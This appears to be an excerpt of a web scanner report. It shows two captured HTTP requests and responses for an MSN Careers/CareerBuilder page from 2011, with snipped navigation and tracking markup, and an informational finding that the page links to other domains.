GET /msn/default.aspx?SiteId=cbmsn_home HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67762
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f2bc2969dbf945128e5dbca1246ed7bf-349642128-w9-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842C6B6C517D8E2441CD1935037681432834654112582D57168177A65DC6D655EA3332BD0BD468B1520; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR9
Date: Sat, 29 Jan 2011 23:48:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbminisite/cbminisiteinternal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">
           
            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&amp;siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&amp;siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<li><a href="http://msn.careerrookie.com/CC/Default.aspx?sc_cmp2=JS_MsnCareerRookie">Entry Level &amp; Internships</a>
...[SNIP]...
<div>

<img src="http://img.icbdr.com/images/MSN/magnifyresume.jpg" alt="Jobs galore on MSN Careers, image .. Getty Images" />


<a href="http://msn.careerbuilder.com/custom/msn/postresume.aspx?siteid=cbmsnchPR" title="Let us work for you">
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/CT101448941033.aspx">Download r..sum.. templates</a>
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/results.aspx?qu=resume+cover+letters&amp;av=TPL000">Download cover letter templates</a>
...[SNIP]...
<div class="linkedimg">
<a href="http://www.facebook.com/careerbuilder?v=app_28134323652" title="flip pane">
<img src="http://img.icbdr.com/images/custom/msn/496x120_display.jpg"width="528" height="120" alt="Contest" /></a>
...[SNIP]...
<div id="featuredArticleLeft" class="clearfix">


<img src="http://img.icbdr.com/images/custom/msn/Howarejobseekersruiningtheirjobsearch.jpg" alt="Jobs" style="float: none;" /><br />
...[SNIP]...
<a href="http://msn.careerbuilder.com/harvest/rss/rssarticlefeed.aspx?type=MSN&count=10&siteid=cbmsnRSS"><img src="http://img.icbdr.com/images/icons/rss.gif" /></a>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl0_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl1_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/DD/I8A3066PC5BVSN70NDD.gif" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&amp;form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<div id="LastBingLink">
<a href="http://local.msn.com/news.aspx"><span class="BingLink">
...[SNIP]...
<input name="btnSubmit" id="btnSubmit" title="Salary Calculator" src="http://img.icbdr.com/images/plink/cbsalary/btn_search.png" style="border-width: 0px; height: 33px;" type="image" />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.236. http://msn.careerbuilder.com/msn/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /msn/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /msn/default.aspx?SiteId=cbmsn_home HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67748
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=dcf2016c64cb429fb27d457728555284-349703517-wi-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1499044D328718EEFABAEEEE8EE257D2FAA022346CA994E74F3FC763E7064694D3CBE36DD95F8137CE8CB78DE29EED3EB; domain=.careerbuilder.com; expires=Mon, 30-Jan-2012 16:51:57 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR19
Date: Sun, 30 Jan 2011 16:51:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbminisite/cbminisiteinternal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">
           
            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&amp;siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&amp;siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<li><a href="http://msn.careerrookie.com/CC/Default.aspx?sc_cmp2=JS_MsnCareerRookie">Entry Level &amp; Internships</a>
...[SNIP]...
<div>

<img src="http://img.icbdr.com/images/MSN/magnifyresume.jpg" alt="Jobs galore on MSN Careers, image .. Getty Images" />


<a href="http://msn.careerbuilder.com/custom/msn/postresume.aspx?siteid=cbmsnchPR" title="Let us work for you">
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/CT101448941033.aspx">Download r..sum.. templates</a>
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/results.aspx?qu=resume+cover+letters&amp;av=TPL000">Download cover letter templates</a>
...[SNIP]...
<div class="linkedimg">
<a href="http://www.facebook.com/careerbuilder?v=app_28134323652" title="flip pane">
<img src="http://img.icbdr.com/images/custom/msn/496x120_display.jpg"width="528" height="120" alt="Contest" /></a>
...[SNIP]...
<div id="featuredArticleLeft" class="clearfix">


<img src="http://img.icbdr.com/images/custom/msn/Howarejobseekersruiningtheirjobsearch.jpg" alt="Jobs" style="float: none;" /><br />
...[SNIP]...
<a href="http://msn.careerbuilder.com/harvest/rss/rssarticlefeed.aspx?type=MSN&count=10&siteid=cbmsnRSS"><img src="http://img.icbdr.com/images/icons/rss.gif" /></a>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl0_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/8B/I8G5005YKFRVZ3CDW8B.gif" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl1_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/DD/I8A3066PC5BVSN70NDD.gif" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&amp;form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<div id="LastBingLink">
<a href="http://local.msn.com/news.aspx"><span class="BingLink">
...[SNIP]...
<input name="btnSubmit" id="btnSubmit" title="Salary Calculator" src="http://img.icbdr.com/images/plink/cbsalary/btn_search.png" style="border-width: 0px; height: 33px;" type="image" />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
